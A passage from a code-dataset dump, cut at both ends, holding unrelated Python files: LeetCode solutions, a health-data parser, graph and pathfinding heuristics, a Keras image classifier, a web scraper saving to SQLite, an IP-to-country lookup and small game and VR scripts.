conquer\"\"\"\n    def _binFind(self, nums, start, end):\n        if start > end:\n            return -1\n        mid = (end - start) // 2 + start\n        left_ans = self._binFind(nums, start, mid - 1)\n        if left_ans != -1:\n            return left_ans\n        elif nums[mid] == mid:\n            return mid\n        return self._binFind(nums, mid + 1, end)\n\n    def findMagicIndex(self, nums) -> int:\n        return self._binFind(nums, 0, len(nums) - 1)\n\n\nif __name__ == \"__main__\":\n    nums = [0, 2, 3, 4, 5]\n    s = Solution()\n    print(s.findMagicIndex(nums))\n","sub_path":"lc/0803.py","file_name":"0803.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"50851648","text":"# /usr/bin/python3.6\n# -*- coding:utf-8 -*-\n\n\nclass Solution(object):\n    def binaryGap(self, N):\n        \"\"\"\n        :type N: int\n        :rtype: int\n        \"\"\"\n        zeros = [len(x) for x in bin(N)[2:].split(\"1\")[1:-1]]\n        if zeros:\n            return max(zeros)+1\n        return 0\n\n\ndef main():\n    s = Solution()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"python/leetcode/868_Binary_Gap.py","file_name":"868_Binary_Gap.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"195373109","text":"from lxml import etree\nfrom tqdm import tqdm\n\n# Get activity/health 
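The nested index loops in combineDatasets above grow as O(lidar rows x logger rows); the same key matching can be one left merge per table, assuming the empty placeholder columns are not pre-created first. A sketch for the topo table (PAI, tch and veg follow the same pattern):

merged = data.merge(
    topo[['site_point'] + list(topoHeaders)],  # the join key plus the lidar variables
    left_on='RiverPointPositionCode',
    right_on='site_point',
    how='left',
).drop(columns='site_point')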
data as XML tree\ntree = etree.parse('../apple_health_export/export.xml')\n\n# -----------------------------------------------------------\n# Parse HKActivitySummary data\n# -----------------------------------------------------------\n# Store the following from `Workout` elements:\n# workoutActivityType, duration, durationUnit,\n# totalEnergyBurned, totalEnergyBurnedUnit,\n# -----------------------------------------------------------\n\n# Get the heart rate data from the XML tree\nworkout_xml_data = list(tree.xpath(\"//ActivitySummary\"))\n\n# for i, data in zip(range(10), workout_xml_data):\n# print('%d,%s' % (i, str(data.attrib)))\n\nactivity_dictionary = dict()\nexercise_time_unit = 'min'\n\nwith open('../ian-torres_health_data/ian-torres_activity_data.csv', 'w') as f:\n f.write('Record_#,Date(Year-Month-Day),Energy_Burned(kcal),'\n 'Energy_Burned_Goal(kcal),'\n 'Exercise_Time(min),Exercise_Time_Goal(min),'\n 'Stand_Hours,Stand_Hours_Goal\\n')\n for i, element in enumerate(tqdm(workout_xml_data, desc='writing activity data')):\n element_attributes = element.attrib\n date_component = element_attributes['dateComponents']\n\n energy_burned = int(float(element_attributes['activeEnergyBurned']))\n energy_burned_goal = int(element_attributes['activeEnergyBurnedGoal'])\n energy_burned_units = element_attributes['activeEnergyBurnedUnit']\n exercise_time = int(float(element_attributes['appleExerciseTime']))\n exercise_time_goal = int(element_attributes['appleExerciseTimeGoal'])\n stand_hours = int(element_attributes['appleStandHours'])\n stand_hours_goal = int(element_attributes['appleStandHoursGoal'])\n f.write('%d,%s,%d,%d,%d,%d,%d,%d\\n' % (\n i, date_component, energy_burned, energy_burned_goal,\n exercise_time, exercise_time_goal, stand_hours, stand_hours_goal\n ))\n","sub_path":"scripts/xml_activity_parser.py","file_name":"xml_activity_parser.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"593297490","text":"# -*- coding: utf-8 -*-\n\n# Autor: Mauricio de Oliveira (mauricioliveira_@hotmail.com)\n# Universidade Federal de Minas Gerais\n# Departamento de Ciência da Computação\n\nimport sys\nimport bisect\nfrom timeit import default_timer as timer\nfrom myfunctions import read_file, create_adj_list\nfrom itertools import combinations \nfrom random import randint, shuffle\n\nFILE_END = '0,0'\nDELIMITER_1 = \",\"\nDELIMITER_2 = \" \" \n\ndef dfs(g, start):\n\n visited = set()\n stack = [start]\n \n while stack:\n\n v = stack.pop()\n\n if v not in visited:\n\n visited.add(v)\n stack.extend(g[v] - visited)\n \n return visited\n\ndef is_connected(g, cds):\n\n if len(cds):\n\n induced_subg = {k: set([item for item in v if item in cds]) \n for k, v in g.items() if k in cds}\n\n k = randint(0, len(cds) - 1)\n v = list(cds)[k]\n seen = dfs(induced_subg, v)\n \n return True if seen == set(cds) else False \n\n else:\n\n return False\n\ndef is_dominating(g, cds, vertices):\n\n if len(cds):\n\n seen = set()\n seen.update(cds)\n seen.update([vv for v in cds for vv in g[v]])\n\n return True if seen == set(vertices) else False \n\n else:\n\n return False\n\ndef calculate_degree(g):\n\n deg_g = {v:len(g[v]) for v in g}\n \n #for key in deg_g: print(key +\":\"+ str(deg_g[key]))\n\n return deg_g \n\ndef order_vertices(deg_g, g, mode):\n\n ordered_vertices = []\n\n for v in g.keys():\n \n uniq_coef = sum([deg_g[vv] for vv in g[v]])\n bisect.insort_left(ordered_vertices, ((float(deg_g[v])/uniq_coef), v))\n 
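A quick sanity check of the CSV the loop above writes (same path and column headers), for example how often the exercise-time goal was met:

import pandas as pd

df = pd.read_csv('../ian-torres_health_data/ian-torres_activity_data.csv')
met = (df['Exercise_Time(min)'] >= df['Exercise_Time_Goal(min)']).mean()
print('exercise goal met on %.0f%% of recorded days' % (100 * met))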
print(v, float(deg_g[v]), uniq_coef)\n ordered_vertices = [v[1] for v in ordered_vertices]\n\n if mode == 1:\n\n # ascending order\n\n return ordered_vertices\n\n elif mode == 2:\n\n # descending order\n\n return ordered_vertices[::-1]\n\n else:\n\n # randomized order\n\n shuffle(ordered_vertices)\n return ordered_vertices\n\ndef find_mcds(g, deg_g, vertices):\n \n mcds = set(vertices)\n watch = list()\n\n for v in vertices:\n\n mcds_copy = mcds.copy()\n mcds_copy.remove(v)\n\n if is_connected(g, mcds_copy) and is_dominating(g, mcds_copy, vertices): \n \n mcds.remove(v)\n watch.append(v)\n\n mcds = sorted(list(mcds))\n return mcds, watch\n\nif __name__ == \"__main__\":\n\n delimiter = DELIMITER_1 if sys.argv[2] == \"1\" else DELIMITER_2\n graph_data = read_file(sys.argv[1], delimiter)\n g = create_adj_list(graph_data)\n\n start = timer()\n deg_g = calculate_degree(g)\n vertices = order_vertices(deg_g, g, int(sys.argv[3]))\n print(vertices, deg_g)\n mcds = find_mcds(g, deg_g, vertices)\n print(\"mcds\")\n print(mcds[0], len(mcds[0]))\n #print(\"vertices\")\n #print(vertices)\n #print(\"ordem\")\n #print(mcds[1], len(mcds[1])) \n end = timer() \n print(end - start)\n\n","sub_path":"final/final/heuristica/mcds_rank.py","file_name":"mcds_rank.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"504365376","text":"class State(object):\n \"\"\"\n Generic datatype for storing a state.\n A state is defined by:\n - its cell\n - its parent state (i.e the (unique) state whose child is self).\n - its cost so far (note that this is redundant, since it could be computed\n from parents, but here we explicitly compute it each time a Solution\n is created).\n \"\"\"\n\n def __init__(self, cell, parent, time_so_far):\n self.cell = cell\n self.parent = parent\n self.time_so_far = time_so_far\n\n def get_all_parents(self):\n if self.parent:\n return self.parent.get_all_parents() + [self.cell]\n else:\n return [self.cell]\n\n\nclass BranchAndBoundForMap:\n def __init__(self, lm, cell_i, cell_f, costs_materials, costs_objects,\n possible_materials, possible_objects):\n self.lm = lm\n self.cell_i = cell_i\n self.cell_f = cell_f\n self.costs_materials = costs_materials\n self.costs_objects = costs_objects\n self.possible_materials = possible_materials\n self.possible_objects = possible_objects\n self.lnl = [] #lnl = Live Nodes List\n self.enode = None #enode = Expanding-Node\n\n def cost(self, state):\n return self.distance(state) + state.time_so_far\n\n def distance(self, state):\n x0,y0 = state.cell.coord\n dx = abs(x0 - self.cell_f.coord[0])\n dy = abs(y0 - self.cell_f.coord[1])\n return dx + dy\n\n def get_children(self, state):\n x, y = state.cell.coord\n children = []\n up = self.lm.get_cell_at(x,y-1)\n down = self.lm.get_cell_at(x,y+1)\n right = self.lm.get_cell_at(x+1,y)\n left = self.lm.get_cell_at(x-1,y)\n for cell in [up,down,right,left]:\n if cell:\n obj_type = None\n possible = False\n if cell.objects:\n obj_type = cell.objects[0].int_type\n if obj_type in self.possible_objects:\n possible = True #e.g, bridge is on material water!\n else:\n possible = True\n if possible:\n really_possible = False\n time = 0.\n if cell.objects:\n time += self.costs_objects.get(obj_type,0.)\n really_possible = True\n elif cell.material.name in self.possible_materials:\n time += self.costs_materials.get(cell.material.name,0.)\n really_possible = True\n## elif cell.objects:\n## really_possible = True\n if really_possible:\n 
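A tiny worked example of the helpers above on the four-vertex path graph a-b-c-d, whose minimum connected dominating set is {b, c}; adjacency values must be sets because dfs computes g[v] - visited:

g = {'a': {'b'}, 'b': {'a', 'c'}, 'c': {'b', 'd'}, 'd': {'c'}}
print(is_connected(g, {'b', 'c'}))            # True: b and c are adjacent
print(is_dominating(g, {'b', 'c'}, list(g)))  # True: every vertex is in or next to the set
print(is_connected(g, {'a', 'c'}))            # False: the induced subgraph has no edge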
child = State(cell, state, state.time_so_far + time)\n children.append(child)\n return children\n\n def solve(self):\n solution = self.process()\n #\n if solution is None:\n return []\n return solution.get_all_parents()\n\n def process(self):\n initial_state = State(self.cell_i, None, self.costs_materials[self.cell_i.material.name])\n self.lnl = [initial_state]\n self.enode = self.lnl.pop()\n already = set([self.enode.cell.coord])\n i = 0\n while True:\n## print(self.enode.cell.coord, self.distance(self.enode))\n if self.distance(self.enode) == 0:\n return self.enode\n else:\n if i > 1e5:\n return\n self.lnl += self.get_children(self.enode)\n if not self.lnl:\n return\n else:\n #sort the lnl and reverse so that default pop function can be called\n self.lnl.sort(key=self.cost, reverse=True)\n #updates enode\n self.enode = self.lnl.pop()\n while self.enode.cell.coord in already and self.lnl:\n self.enode = self.lnl.pop()\n already.add(self.enode.cell.coord)\n i += 1\n","sub_path":"ia/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"519355033","text":"from typing import List\nfrom injecta.service.Service import Service\n\nclass Classes2ServicesBuilder:\n\n def build(self, services: List[Service]):\n classes = {}\n\n for service in services:\n moduleName = service.class_.moduleName\n className = service.class_.className\n\n if moduleName not in classes:\n classes[moduleName] = {}\n\n if className not in classes[moduleName]:\n classes[moduleName][className] = []\n\n classes[moduleName][className].append(service.name)\n\n return classes\n","sub_path":"src/injecta/service/Classes2ServicesBuilder.py","file_name":"Classes2ServicesBuilder.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"282635235","text":"import json\nimport os\nimport matplotlib.pyplot as plt\nfrom os.path import expanduser\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport pathlib\n\ndef isImgFile(file):\n # Check if file has certain base name and is of the proper file type\n return file.endswith(\".png\") and not(file.endswith(\".cs.png\")) and not(file.endswith(\".depth.png\"))\n\n\ndef isBboxFile(file):\n # Check if file has certain base name and is of the proper file type\n return file.endswith(\".json\")\n\n\nclass Dataloader(Dataset):\n\n # Initialize the Dataloader (this is the constructor)\n def __init__(self, base_directory):\n # Get the file names\n ROOT = pathlib.Path(expanduser(\"~\")) / base_directory\n self.filenames_img = [os.path.join(path, file) for path, directories, filenames in os.walk(ROOT) for\n file in filenames if isImgFile(file)]\n self.filenames_bbox = [os.path.join(path, file) for path, directories, filenames in os.walk(ROOT) for\n file in filenames if isBboxFile(file)]\n\n self.filenames = [os.path.splitext(file)[0] for path, directories, filenames in os.walk(ROOT) for file in filenames if\n isImgFile(file)]\n\n # Check if we have same number of images and bounding boxes\n assert len(self.filenames_img) == len(self.filenames_bbox), 'Not the same number of images and bounding boxes'\n\n # Sort the lists to make sure that we entries of _img and _bbox correspond to one another.\n self.filenames_img.sort()\n self.filenames_bbox.sort()\n self.filenames.sort()\n\n print(self.filenames)\n\n def __getitem__(self, index):\n # Get image file name.\n filename_img = 
self.filenames_img[index]\n\n # Open file.\n with open(filename_img, 'rb') as f:\n # Read file as RGB image.\n img = Image.open(f).convert('RGB')\n\n # Get json file name.\n filename_bbox = self.filenames_bbox[index]\n\n # Open file.\n with open(filename_bbox, 'rb') as g:\n # Read bbox from .json file.\n bbox = json.load(g)[\"objects\"][0][\"bounding_box\"]\n\n with open(filename_bbox, 'rb') as h:\n # Read bbox from .json file.\n label = json.load(h)[\"objects\"][0][\"class\"]\n\n return img, bbox\n\n def __len__(self):\n return len(self.filenames_img)\n\nif __name__ == '__main__':\n a = Dataloader(\"data/Eigenes_Set/Kite\")\n b, c = a[0]\n plt.imshow(b)\n print(c[\"top_left\"][0])","sub_path":"vision/datasets/eigener_loader.py","file_name":"eigener_loader.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"588215938","text":"import os\nimport matplotlib.image as img\nimport numpy\nfrom tensorflow import keras\nfrom scipy import misc\nfrom PIL import Image,ImageDraw\nimages = os.listdir(\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Train\")\nresized_images = os.listdir(\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized\")\ntrain = os.listdir(\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Test\")\nresized_train = os.listdir(\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized_Test\")\nshapes = [\"triangle\",\"square\",\"pentagon\",\"hexagon\"]\nprocesssed_images = []\n\n\n\n\nfor i in images:\n ig = Image.open(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Train\\\\{i}\")\n ig = ig.resize((28,28))\n ig.save(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized\\\\{i}\")\nfor i in resized_images:\n n = img.imread(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized\\\\{i}\")\n processsed_images.append(n)\n\nTest_images = numpy.array(processsed_images)\n\ns = 0\nfor i in Test_images:\n for k in i:\n for x in k:\n noofshapes = len(x)\n for m in x:\n s += 1\n\ndiv = s\nTest_images = Test_images/255\n\n\n\nmodel = keras.Sequential([\n keras.layers.Flatten(input_shape=(28, 28, 3)),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(512,activation='relu'),\n keras.layers.Dense(len(shapes))\n])\n\nlabel = []\nwith open(\"label.txt\",'r') as f:\n data = f.read()\n label = data.split(\",\")\n f.close()\n\nfor i in range(0,len(label)):\n label[i] = float(label[i])\n\nlabel = numpy.array(label)\n\nmodel.compile(optimizer='adam',\n loss= keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n\ncheckpoint_path = \"training_1/cp.ckpt\"\ncheckpoint_dir = os.path.dirname(checkpoint_path)\n\ncp_callback = keras.callbacks.ModelCheckpoint(filepath=checkpoint_path,\n save_weights_only=True,\n verbose=1)\n\n#model.fit(Test_images, label, epochs=10,callbacks=cp_callback)\n\ntest_images = []\ntest_images_directory = []\n\nfor i in train:\n ig = Image.open(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Test\\\\{i}\")\n ig = ig.resize((28,28))\n ig.save(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized_Test\\\\{i}\")\nfor i in resized_train:\n n = img.imread(f\"C:\\\\Users\\\\Ayush 
Sharma\\\\Desktop\\\\CodeField\\\\Resized_Test\\\\{i}\")\n test_images_directory.append(f\"C:\\\\Users\\\\Ayush Sharma\\\\Desktop\\\\CodeField\\\\Resized_Test\\\\{i}\")\n test_images.append(n)\n\n\ntest_images_array = numpy.array(test_images)\nprobability_model = keras.Sequential([model, keras.layers.Softmax()])\n\n\npredictions = probability_model.predict(test_images_array)\nprint(predictions)\n\nimport math\nfor i in range(0,len(predictions)):\n image = Image.open(test_images_directory[i])\n image = image.resize((500,500))\n for k in range(0,len(predictions[i])):\n if predictions[i][k]*100 > 25: \n v = str(shapes[k]) + \":\" + str(predictions[i][k]*100)\n\n try:\n x = round(math.sqrt(s))/noofshapes\n except:\n x = round(math.sqrt(s))\n noofshapes -= 1\n tx = ImageDraw.Draw(image)\n tx.text((x,x),v,fill=(0,0,0,0))\n \n image.save(\"a.png\")\n image.show()\n\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"105844890","text":"from time import sleep\nfrom turtle import Screen, Turtle\n\ncolors = ['red', 'green', 'blue', 'brown', 'purple', 'black']\ncurrent_postion = -300\ncurrent_color = 0\n\ndef next_color():\n global current_color\n result = colors[current_color % len(colors)]\n current_color += 1\n return result\n\nclass RaceTurtle(Turtle):\n def __init__(self):\n super().__init__()\n self.shape('turtle')\n self.setheading(90)\n self.race_speed = 1\n self.shapesize(2, 2, 1)\n self.speed('fastest')\n self.old_color = next_color()\n self.color(self.old_color)\n\n def set_speed(self, speed):\n self.race_speed = speed\n\n def celebrate(self):\n while True:\n self.color('yellow')\n sleep(1)\n self.color(self.old_color)\n sleep(1)\n\n\n def race_move(self):\n self.forward(self.race_speed / 10)\n if self.ycor() > 200:\n return False\n return True\n\n\nclass Race():\n def __init__(self):\n super().__init__()\n self.screen = Screen()\n self.screen.screensize(500, 500)\n self.turtles = []\n self.last_turtle_position = -300\n self.last_turtle_color = 0\n\n def new_turtle(self):\n t = RaceTurtle()\n t.penup()\n t.setx(self.last_turtle_position)\n self.last_turtle_position += 100\n t.sety(-200)\n\n t.speed('slow')\n self.turtles.append(t)\n\n return t\n\n def stop_race(self, winner):\n winner.celebrate()\n\n def run(self):\n while True:\n for t in self.turtles:\n if not t.race_move():\n self.stop_race(t)\n self.screen.mainloop()\n","sub_path":"lesson2/racelib.py","file_name":"racelib.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"413954773","text":"#!/usr/bin/env python\nimport ipaddress\nimport os\nimport threading\nimport logging\ntry:\n from functools import lru_cache\nexcept ImportError:\n from backports.functools_lru_cache import lru_cache\n\nimport six\nfrom tinydb import TinyDB, Query\nfrom tinydb.middlewares import CachingMiddleware\n\nfrom iptocc.json_storage_read_only import JSONStorageReadOnly\n\n__author__ = \"Ronie Martinez\"\n__copyright__ = \"Copyright 2017, Ronie Martinez\"\n__credits__ = [\"Ronie Martinez\"]\n__license__ = \"MIT\"\n__version__ = \"1.0.2\"\n__maintainer__ = \"Ronie Martinez\"\n__email__ = \"ronmarti18@gmail.com\"\n__status__ = \"Production\"\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\ncaching_middleware = CachingMiddleware(JSONStorageReadOnly)\ndatabase = TinyDB(os.path.join(dir_path, 
'rir_statistics_exchange.json'), storage=caching_middleware)\nquery = Query()\n\nlock = threading.Lock()\nlogger = logging.getLogger(__name__)\n\n\n@lru_cache(maxsize=100000)\ndef ipv4_get_country_code(ip_address):\n with lock:\n for record in database.search(query.type == 'ipv4'):\n start_address = ipaddress.IPv4Address(record.get('start'))\n if start_address <= ip_address < start_address + record.get('value'):\n country_code = record.get('country_code')\n if six.PY2:\n country_code = str(country_code)\n logger.debug('Country code for ip=%s is %s.', ip_address, country_code)\n return country_code\n logger.debug('Cannot find country code for ip=%s', ip_address)\n return None\n\n\n@lru_cache(maxsize=100000)\ndef ipv6_get_country_code(ip_address):\n with lock:\n for record in database.search(query.type == 'ipv6'):\n network = ipaddress.IPv6Network('{}/{}'.format(record.get('start'), record.get('value')))\n if ip_address in network:\n country_code = record.get('country_code')\n if six.PY2:\n country_code = str(country_code)\n logger.debug('Country code for ip=%s is %s.', ip_address, country_code)\n return country_code\n logger.debug('Cannot find country code for ip=%s', ip_address)\n return None\n\n\ndef get_country_code(ip_address):\n # convert string to ipaddress.IPv4Address or ipaddress.IPv6Address\n if isinstance(ip_address, six.text_type):\n ip_address = ipaddress.ip_address(ip_address)\n if six.PY2 and isinstance(ip_address, six.string_types):\n ip_address = ipaddress.ip_address(unicode(ip_address))\n if isinstance(ip_address, ipaddress.IPv4Address):\n return ipv4_get_country_code(ip_address) # IPv4\n return ipv6_get_country_code(ip_address) # IPv6\n","sub_path":"iptocc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"444203216","text":"import re\nfrom urllib.request import urlopen,Request\nimport sqlite3\n\nclass DataManager(object):\n def updata_new_data(self,oldData):\n # 去除换行\n name = oldData[0]\n name = name.strip('\\n')\n content = oldData[2]\n content = content.strip('\\n')\n # 去除
<br/>\n pattern = re.compile(r'<br/>
')\n content = pattern.sub('',content)\n newData = (name,oldData[1],content,oldData[3],oldData[4])\n\n return newData\n\nclass DBManager(object):\n connect = None\n coursor = None\n\n @classmethod\n def create_db_and_table(cls):\n cls.connect = sqlite3.connect(\"qbDB\")\n cls.coursor = cls.connect.cursor()\n cls.coursor.execute('create table if not exists qbTable (name text ,'\n 'age text , content text , like text ,comment text)')\n cls.connect.commit()\n\n @classmethod\n def insert_into_table(cls,receiveData):\n cls.coursor.execute('insert into qbTable (name,age,content,like,comment) VALUES (\"{}\",\"{}\",\"{}\",\"{}\",\"{}\")'.format(receiveData[0],receiveData[1],receiveData[2],receiveData[3],receiveData[4]))\n cls.connect.commit()\n\n @classmethod\n def close_db(cls):\n cls.coursor.close()\n cls.connect.close()\n\nclass QSBKSpider(object):\n def __init__(self):\n # 设置基本网址,基本网址为所有需要爬虫的网址的共同部分\n self.base_url = 'https://www.qiushibaike.com/hot/page/'\n # 设置爬虫的用户标识\n self.headers = {\n \"User-Agent\":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 OPR/56.0.3051.99'\n }\n # 创建一个数据管理的实例化对象\n # 并使其作为QSBKSpider的属性\n self.dataTool = DataManager()\n\n def get_code_from_url(self,index):\n # 拼接完整的url\n url = self.base_url + str(index) + '/'\n # 设置请求的url的请求头信息\n request = Request(url,headers = self.headers)\n # 获取响应信息\n response = urlopen(request)\n try:\n # 读取响应信息并解码\n code = response.read().decode()\n except Exception as e:\n print('获取信息失败',e)\n return None\n else:\n return code\n\n def get_userfull_info_from_code(self,code):\n pattern = re.compile(r'
<div class=\"author clearfix\">.*?<h2>(.*?)</h2>.*?<div class=\"articleGender \\w*Icon\">(.*?)</div>.*?<div class=\"content\">
.*?(.*?).*?.*?(.*?).*?.*?(.*?)',re.S)\n result = pattern.findall(code)\n\n for oldData in result:\n newData = self.dataTool.updata_new_data(oldData)\n DBManager.insert_into_table(newData)\n\nDBManager.create_db_and_table()\n\nqbSpider = QSBKSpider()\n# 获取网页源码并转码\ncode = qbSpider.get_code_from_url(1)\n\nfor x in range(1,6):\n code = qbSpider.get_code_from_url(x)\n # 提取网页数据\n qbSpider.get_userfull_info_from_code(code)\nDBManager.close_db()","sub_path":"python/复习专用/13号/糗事百科.py","file_name":"糗事百科.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"419404479","text":"# Create your views here.\nfrom django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponse, HttpResponseForbidden, HttpResponseBadRequest, StreamingHttpResponse\nfrom django.core.urlresolvers import reverse\nimport json\nfrom django.utils.translation import ugettext_lazy as _\nfrom django_user_agents.utils import get_user_agent\n\n\ndef _getTemplate(action):\n return \"samiServicios/home/{0}.html\".format(action)\n\ndef index(request, *args, **kwargs):\n \n agent = get_user_agent(request)\n\n os = agent.os.family.lower() if agent.os.family else \"\"\n esTablet = agent.is_tablet\n\n osReal = \"\"\n \n if \"android\" in os:\n osReal = \"android\"\n\n elif \"ios\" in os:\n osReal = \"ios\"\n\n elif \"blackberry\" in os:\n osReal = \"bb\"\n\n elif \"windows phone\" in os:\n osReal = \"wp\"\n\n else:\n osReal = \"pc\"\n \n \n return render(request, _getTemplate('index'), {'osReal':osReal, 'esTablet':esTablet})\n\n\n","sub_path":"SAMI/samiServicios/controllers/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"175695278","text":"import gs\r\nimport os\r\nimport vr_controller\r\nimport json\r\n\r\nplus = gs.GetPlus()\r\n\r\n\r\npath_object_textures = \"\"\r\nswitch_object_textures = None\r\n\r\n\r\ndef load_params(save, scn, openvr_frame_renderer, gui):\r\n\tglobal path_object_textures, switch_object_textures\r\n\tif \"path_object_textures\" in save:\r\n\t\tpath_object_textures = save[\"path_object_textures\"]\r\n\t\tif os.path.exists(path_object_textures):\r\n\t\t\twith open(path_object_textures, 'r') as outfile:\r\n\t\t\t\tswitch_object_textures = json.load(outfile)\r\n\r\n\r\ndef save_params(save, scn, openvr_frame_renderer, gui):\r\n\tsave[\"path_object_textures\"] = path_object_textures\r\n\r\n\r\ndef post_load_scene(scn, openvr_frame_renderer, gui):\r\n\tif switch_object_textures is None or not len(switch_object_textures):\r\n\t\treturn\r\n\r\n\tfor name_object, data in switch_object_textures.items():\r\n\t\tnode = scn.GetNode(name_object)\r\n\t\tif node is not None:\r\n\t\t\tswitch_object_textures[name_object][\"node\"] = node\r\n\r\n\t\t\t# add the rigid body to raycast later\r\n\t\t\tif node.GetComponent(\"RigidBody\") is None:\r\n\t\t\t\tnode.AddComponent(gs.MakeRigidBody())\r\n\t\t\t\tmesh_col = gs.MakeMeshCollision()\r\n\t\t\t\tmesh_col.SetGeometry(gs.LoadCoreGeometry(node.GetObject().GetGeometry().GetName()))\r\n\t\t\t\tmesh_col.SetMass(0)\r\n\t\t\t\tnode.AddComponent(mesh_col)\r\n\t\t\t\tnode.SetIsStatic(True)\r\n\r\n\r\ndef update_gui(scn, openvr_frame_renderer, gui):\r\n\tglobal switch_object_textures, path_object_textures\r\n\tif gui.Button(\"Load switch object textures file\"):\r\n\t\tcurrent_filename = gs.OpenFileDialog(\"Load 
switch object textures file\", \"*.json\", \"\")[1]\r\n\t\tif current_filename != \"\":\r\n\t\t\twith open(current_filename, 'r') as outfile:\r\n\t\t\t\tswitch_object_textures = json.load(outfile)\r\n\t\t\t\tpath_object_textures = current_filename\r\n\r\n\t\t\t\tpost_load_scene(scn, openvr_frame_renderer, gui)\r\n\r\n\r\nbutton_pressed = False\r\nselected_material = None\r\nselected = {\"n\": None, \"m\": None}\r\n\r\n\r\ndef update(scn, openvr_frame_renderer):\r\n\tglobal button_pressed, selected_material\r\n\tif switch_object_textures is None or len(switch_object_textures) <= 0:\r\n\t\treturn\r\n\r\n\tif selected_material is None: # load the selected material\r\n\t\tselected_material = plus.LoadMaterial(\"assets/selected.mat\")\r\n\r\n\tcontroller0 = gs.GetInputSystem().GetDevice(\"openvr_controller_0\")\r\n\r\n\t# restore material\r\n\tif selected[\"n\"] is not None:\r\n\t\tgeo = selected[\"n\"].GetObject().GetGeometry()\r\n\t\tfor m in range(geo.GetMaterialCount()):\r\n\t\t\tgeo.SetMaterial(m, selected[\"m\"][m])\r\n\t\tselected[\"n\"] = None\r\n\t\tselected[\"m\"] = None\r\n\r\n\tpos_laser = None\r\n\tdir_laser = None\r\n\tclick_on_switch = False\r\n\r\n\tif openvr_frame_renderer is not None and controller0 is not None:\r\n\t\tif controller0.GetValue(gs.InputDevice.InputButton2) > 0.2:\r\n\t\t\tmat_controller = controller0.GetMatrix(gs.InputDevice.MatrixHead)\r\n\r\n\t\t\tpos_cam = scn.GetCurrentCamera().GetTransform().GetPosition()\r\n\t\t\tpos_laser = mat_controller.GetTranslation() + pos_cam\r\n\t\t\tdir_laser = mat_controller.GetZ()\r\n\r\n\t\t\tif controller0.GetValue(gs.InputDevice.InputButton2) == 1.0:\r\n\t\t\t\tclick_on_switch = True\r\n\telse:\r\n\t\tif plus.KeyDown(gs.InputDevice.KeySpace) or plus.KeyDown(gs.InputDevice.KeyW):\r\n\t\t\tpos_laser = scn.GetCurrentCamera().GetTransform().GetPosition()\r\n\t\t\tdir_laser = scn.GetCurrentCamera().GetTransform().GetWorld().GetZ()\r\n\r\n\t\tif plus.KeyDown(gs.InputDevice.KeyW):\r\n\t\t\tclick_on_switch = True\r\n\r\n\tif pos_laser is not None:\r\n\t\thit, trace = scn.GetPhysicSystem().Raycast(pos_laser, dir_laser, 1)\r\n\t\tif hit:\r\n\t\t\t# helper_2d.draw_line(scene_simple_graphic, pos_laser, trace.GetPosition(),\r\n\t\t\t# gs.Color(238 / 255, 235 / 255, 92 / 255))\r\n\t\t\t# if not use_vr:\r\n\t\t\t# \thelper_2d.draw_cross(scene_simple_graphic, trace.GetPosition(),\r\n\t\t\t# \t gs.Color(238 / 255, 235 / 255, 92 / 255))\r\n\r\n\t\t\tname = trace.GetNode().GetName()\r\n\t\t\tif name in switch_object_textures:\r\n\t\t\t\tselected_node = 